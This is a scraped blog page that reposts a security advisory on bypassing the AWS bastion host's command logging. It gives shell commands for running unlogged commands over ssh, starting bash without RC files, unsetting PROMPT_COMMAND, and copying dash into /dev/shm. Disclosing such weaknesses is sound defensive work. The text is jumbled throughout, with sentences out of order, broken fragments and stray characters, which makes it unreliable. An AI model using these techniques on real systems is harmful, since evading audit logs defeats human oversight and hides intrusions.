soliterra.blogg.se

$ ssh -i testkey.pem -l ec2-user 13.239.22.233 'echo "This is a command executed directly"' The following figure shows a command executed via SSH and the resulting log which does not include the command: For example, directly executing commands via SSH. Jul 27 08:28:50 :Mon Jul 27 08:28: :10.64.0.44 :ec2-user :/home/ec2-user: bash -norc -noprofileĪny command execution not performed via bash was not logged. $ scp -i testkey.pem /usr/bin/dash :/dev/shm/ The following figure details this technique: Jul 27 08:26:19 :Mon Jul 27 08:26: :10.64.0.44 :ec2-user :/home/ec2-user: envīy providing their own shell executable, an attacker may gain interactive access to the bastion without being logged. bash: unset: PROMPT_COMMAND: cannot unset: readonly ~]$ bash -norc -noprofileīash-4.2$ tail -5 /var/log/bastion/bastion.log Jul 27 08:11:12 :Mon Jul 27 08:11: :10.64.0.44 :ec2-user :/home/ec2-user: chmod +x ~]$Īn attacker could spawn a bash instance that ignores the RC files and subsequently unset the PROMPT_COMMAND ~]$ unset PROMPT_COMMAND Will this turn up in the bastion ~]$ tail -5 /var/log/bastion/bastion.log The AWS bastion used the PROMPT_COMMAND environment variable, set as read-only in /etc/bashrc, as shown in the following ~]$ echo '' > ~]$ chmod +x ~]$ export ~]$ echo 'will this turn up in the bastion log?' Note, this should not be considered a definitive list and further techniques to avoid the /etc/bashrc based command logging very likely exist.

Techniques to bypass this mechanism are detailed below. The /etc/bashrc file set a read-only PROMPT_COMMAND environment variable which executed the logger command. The core issue stemmed from the use of /etc/bashrc as a mechanism for enforcing command logging. The command auditing implementation allowed a user to bypass the logging, execute an interactive shell and issue commands that were not captured by the AWS bastion’s logging mechanisms.ĭate Released: Author: Denis Andzakovic Project Website: Affected Software: Amazon AWS Bastion AWS Bastion Logger Bypass These command logs are stored both on the bastion host itself, and forwarded to Cloudwatch. The AWS bastion host ( ) is intended to provide command logging for all users.